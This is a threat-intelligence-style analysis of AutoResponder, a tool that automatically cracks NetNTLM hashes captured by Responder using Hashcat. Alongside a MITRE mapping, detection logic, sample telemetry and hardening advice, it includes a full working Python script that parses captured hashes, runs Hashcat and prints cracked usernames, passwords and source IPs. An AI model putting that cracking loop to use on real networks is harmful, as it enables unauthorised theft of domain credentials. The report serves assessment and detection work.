Full Report
When doing internals, usually an easy first step is to use Responder and wait to retrieve NTLM hashes, crack them and hope for a weak password. The problem is that sometimes fancy cracking rigs might not be available, and it might be a mess to copy/paste all those hashes, send them and wait for an answer when you could already do some work locally, without any effort. We're all lazy, and I'm even lazier. That's why I decided to do this project.
Analysis Summary
# Tool/Technique: AutoResponder
## Overview
AutoResponder is a Python script that automates the loop of capturing NetNTLMv1/v2 challenge-response hashes with Responder, handing them straight to a local Hashcat instance for offline cracking, and printing the results, removing the manual copy/paste of hashes between the two tools.
## Technical Details
- Type: Tool
- Platform: Linux (specifically mentioned to work out of the box on Kali Linux)
- Capabilities: Monitors Responder's log directory, extracts newly written NetNTLMv1 and NetNTLMv2 hashes as they appear, and runs Hashcat against them immediately with the supplied wordlists.
- First Seen: December 11, 2015
## MITRE ATT&CK Mapping
The workflow captures NetNTLM challenge-response hashes by answering LLMNR/NBT-NS name lookups on the local segment (Responder) and then cracks them offline (Hashcat). Neither step dumps credential stores from a host, so OS Credential Dumping (T1003) does not apply.
- **TA0006 - Credential Access**
  - T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (the capture step, performed by Responder)
  - T1110.002 - Brute Force: Password Cracking (the Hashcat step driven by AutoResponder)
- **TA0009 - Collection**
  - T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (also listed under Collection, as the captured authentication material is gathered in Responder's log files)
## Functionality
### Core Capabilities
* **Hash Capture Monitoring:** Monitors the log directory generated by the Responder tool for newly captured NTLMv1 and NTLMv2 hashes.
* **Hash Loading:** Automatically loads captured hashes from Responder logs upon detection.
* **Local Cracking Execution:** Executes Hashcat locally using provided wordlists against the captured hashes.
* **Immediate Feedback:** Displays successfully cracked credentials (Username:Password) and the originating IP address directly to the console.
### Advanced Features
* **Integration:** Designed to run concurrently with Responder during internal network assessments.
* **Configuration Flexibility:** Allows users to specify paths for wordlists, the Responder logs directory, and the Hashcat binary (defaults to Kali standard paths if omitted).
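The capture-then-crack loop described in the capabilities above, as an added example written for this page rather than AutoResponder's own code. It assumes Responder writes one capture file per client under its logs directory with the client IP in the file name (e.g. `SMB-NTLMv2-SSP-<ip>.txt`), that `hashcat` is on PATH and accepts the usual NetNTLMv1 (`-m 5500`) and NetNTLMv2 (`-m 5600`) input formats, and a hypothetical work directory `/tmp/autoresp` for the hash and pot files. Parsing and command construction are split into functions so they can be checked without a GPU or a live capture.

```python
"""Added example: poll Responder's logs, crack new NetNTLM hashes locally.

Assumptions (not from the original page): Responder capture file names contain
the client IP, e.g. SMB-NTLMv2-SSP-10.0.0.5.txt; hashcat modes 5500/5600.
"""
import re
import subprocess
import sys
import time
from pathlib import Path

HASHCAT_MODES = {"NTLMv1": 5500, "NTLMv2": 5600}
_HEX = re.compile(r"^[0-9a-fA-F]+$")
_IP = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")


def classify_netntlm(line):
    """Return (version, user, domain) for a Responder hash line, else None.

    NetNTLMv1: user::DOMAIN:LMresp(48 hex):NTresp(48 hex):challenge(16 hex)
    NetNTLMv2: user::DOMAIN:challenge(16 hex):NTProofStr(32 hex):blob(hex)
    """
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        return None
    user, _, domain, f3, f4, f5 = parts
    if not all(_HEX.match(f) for f in (f3, f4, f5)):
        return None
    if (len(f3), len(f4), len(f5)) == (48, 48, 16):
        return ("NTLMv1", user, domain)
    if len(f3) == 16 and len(f4) == 32 and len(f5) >= 32:
        return ("NTLMv2", user, domain)
    return None


def source_ip(filename):
    """The client IP embedded in a Responder capture file name (assumption)."""
    m = _IP.search(filename)
    return m.group(1) if m else None


def collect_new_hashes(logs_dir, seen):
    """Scan the logs dir; return [(version, hashline, ip)] not seen before."""
    found = []
    for path in sorted(Path(logs_dir).glob("*.txt")):
        ip = source_ip(path.name)
        for line in path.read_text(errors="ignore").splitlines():
            line = line.strip()
            info = classify_netntlm(line)
            if info and line not in seen:
                seen.add(line)
                found.append((info[0], line, ip))
    return found


def hashcat_cmd(hashcat, version, hashfile, wordlist, potfile):
    """Straight (wordlist) attack for one NetNTLM format, private potfile."""
    return [hashcat, "-m", str(HASHCAT_MODES[version]), "-a", "0", "--quiet",
            "--potfile-path", str(potfile), str(hashfile), str(wordlist)]


def parse_show_output(show_output, hashlines):
    """Map submitted hash lines to passwords from `hashcat --show` output.

    The hash itself contains colons and so may the password, so match on the
    known hash as a prefix instead of splitting the line on ':'.
    """
    cracked = {}
    for out in show_output.splitlines():
        for h in hashlines:
            if out.lower().startswith(h.lower() + ":"):
                cracked[h] = out[len(h) + 1:]
    return cracked


def crack(version, entries, hashcat, wordlist, workdir):
    """Write one format's hashes to disk, run hashcat, read back the cracks."""
    workdir = Path(workdir)
    hashfile, potfile = workdir / f"{version}.txt", workdir / "auto.pot"
    hashlines = [e[1] for e in entries]
    hashfile.write_text("\n".join(hashlines) + "\n")
    subprocess.run(hashcat_cmd(hashcat, version, hashfile, wordlist, potfile))
    show = subprocess.run(
        [hashcat, "-m", str(HASHCAT_MODES[version]), "--show",
         "--potfile-path", str(potfile), str(hashfile)],
        capture_output=True, text=True).stdout
    return parse_show_output(show, hashlines)


def watch(logs_dir, wordlist, hashcat="hashcat", workdir="/tmp/autoresp", interval=5):
    """Poll Responder's logs dir; print DOMAIN\\user:password and source IP."""
    Path(workdir).mkdir(parents=True, exist_ok=True)
    seen = set()
    while True:
        new = collect_new_hashes(logs_dir, seen)
        for version in HASHCAT_MODES:
            batch = [e for e in new if e[0] == version]
            if not batch:
                continue
            cracked = crack(version, batch, hashcat, wordlist, workdir)
            for _, h, ip in batch:
                if h in cracked:
                    _, user, domain = classify_netntlm(h)
                    print(f"[+] {domain}\\{user}:{cracked[h]} (from {ip})")
        time.sleep(interval)


if __name__ == "__main__":  # usage: script.py <responder-logs-dir> <wordlist>
    watch(sys.argv[1], sys.argv[2])
```

Hashes are batched per format because Hashcat runs a single hash mode per invocation; the private potfile means a second pass over the same capture returns instantly from `--show` without re-cracking.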
## Indicators of Compromise
* File Hashes: N/A (Tool, not malware)
* File Names: `auto_responder.py`
* Registry Keys: N/A
* Network Indicators: None from AutoResponder itself; it only reads files on disk and runs Hashcat locally. The observable network activity belongs to the Responder instance it runs beside (LLMNR/NBT-NS/mDNS responses and the rogue SMB/HTTP listeners that collect the authentication attempts).
* Behavioral Indicators: Reading/monitoring the per-client capture files Responder writes under its logs directory; execution of the `hashcat` binary in a NetNTLM mode (`-m 5500` or `-m 5600`) shortly after a capture event.
## Associated Threat Actors
* No specific threat groups are mentioned; this is described as a utility for internal assessments and security researchers (lazy penetration testers).
## Detection Methods
* **Signature-based detection:** The script file name (`auto_responder.py`) or execution of the script from the cloned Git repository path.
* **Behavioral detection:** A Python process that watches Responder's logs directory and then spawns the local `hashcat` binary in a NetNTLM mode, on a host where Responder (a network poisoning tool) is running at the same time.
* **YARA rules:** N/A (Not applicable unless looking for the source code file).
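The behavioural detection above, run over a constructed set of process-execution events. This is an added example, not code from the page or the tool; the event fields are an assumption modelled on auditd/EDR execve telemetry and every command line in the sample is made up. It flags a `hashcat` run in a NetNTLM mode whose ancestor chain contains a Python interpreter while a `Responder.py` process started on the same host within a time window, and ignores an unrelated hashcat run in NTLM mode 1000 launched directly from a shell.

```python
"""Added example: flag python -> hashcat (NetNTLM) chains next to Responder.

Event shape is an assumption (ts in epoch seconds, pid, ppid, image path,
full command line), modelled on execve telemetry from auditd or an EDR.
"""
from collections import namedtuple
from pathlib import Path
import shlex

Event = namedtuple("Event", "ts pid ppid image cmdline")

NETNTLM_MODES = {"5500", "5600"}  # hashcat NetNTLMv1 / NetNTLMv2

# Constructed sample telemetry, not a real capture.
SAMPLE_EVENTS = [
    Event(100, 200, 1, "/bin/bash", "bash"),
    Event(101, 210, 200, "/usr/bin/python3", "python3 Responder.py -I eth0 -wrf"),
    Event(102, 220, 200, "/usr/bin/python3",
          "python3 auto_responder.py -l /opt/Responder/logs -w /usr/share/wordlists/rockyou.txt"),
    Event(160, 230, 220, "/usr/bin/hashcat",
          "hashcat -m 5600 -a 0 --quiet --potfile-path /tmp/auto.pot /tmp/NTLMv2.txt /usr/share/wordlists/rockyou.txt"),
    # Benign-looking control: NTLM (mode 1000) from a shell, not a NetNTLM mode.
    Event(170, 240, 200, "/usr/bin/hashcat",
          "hashcat -m 1000 -a 0 sam_dump.txt /usr/share/wordlists/rockyou.txt"),
]


def hashcat_mode(cmdline):
    """Pull the -m / --hash-type value out of a hashcat command line."""
    argv = shlex.split(cmdline)
    for i, a in enumerate(argv):
        if a == "-m" and i + 1 < len(argv):
            return argv[i + 1]
        if a.startswith("--hash-type="):
            return a.split("=", 1)[1]
    return None


def runs_responder(cmdline):
    """True if any argument is the Responder.py script (by basename, so that
    auto_responder.py does not match)."""
    return any(Path(a).name.lower() == "responder.py" for a in shlex.split(cmdline))


def ancestors(pid, by_pid):
    """Walk parent links upward; stop at an unknown pid or a cycle."""
    chain, visited = [], set()
    while pid in by_pid and pid not in visited:
        visited.add(pid)
        e = by_pid[pid]
        chain.append(e)
        pid = e.ppid
    return chain


def find_auto_cracking(events, window=600):
    """Return one alert per hashcat NetNTLM run whose ancestry includes a
    Python interpreter, listing Responder processes seen within `window` s."""
    by_pid = {e.pid: e for e in events}
    responder = [e for e in events if runs_responder(e.cmdline)]
    alerts = []
    for e in events:
        mode = hashcat_mode(e.cmdline) if Path(e.image).name == "hashcat" else None
        if mode not in NETNTLM_MODES:
            continue
        py = next((a for a in ancestors(e.ppid, by_pid)
                   if Path(a.image).name.startswith("python")), None)
        if py is None:
            continue
        near = [r.pid for r in responder if abs(e.ts - r.ts) <= window]
        alerts.append({"hashcat_pid": e.pid, "python_pid": py.pid,
                       "python_cmdline": py.cmdline, "mode": mode,
                       "responder_pids": near})
    return alerts


if __name__ == "__main__":
    for alert in find_auto_cracking(SAMPLE_EVENTS):
        print(alert)
```

Requiring the Python ancestor plus a Responder process in the window keeps an analyst's manual `hashcat -m 5600` run from alerting on its own; tuning `window` to the host's typical Responder session length is the main knob.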
## Mitigation Strategies
* **Prevention Measures:** Restrict the execution of unsigned or unapproved Python scripts and of cracking tools such as Hashcat on production systems through application control.
* **Hardening Recommendations:** Enforce strong password policies so that wordlist cracking of captured NetNTLM hashes fails; disable LLMNR (Group Policy: "Turn off multicast name resolution") and NBT-NS (adapter or DHCP scope settings) on domain hosts; where a segment still needs them, limit multicast and broadcast name-resolution traffic with firewall rules.
## Related Tools/Techniques
* **Responder:** The prerequisite tool whose output (NTLM hashes) AutoResponder consumes.
* **Hashcat:** The cracking utility executed by AutoResponder.
* **Autoresp:** The inspiration for this project written by Dan McInerney.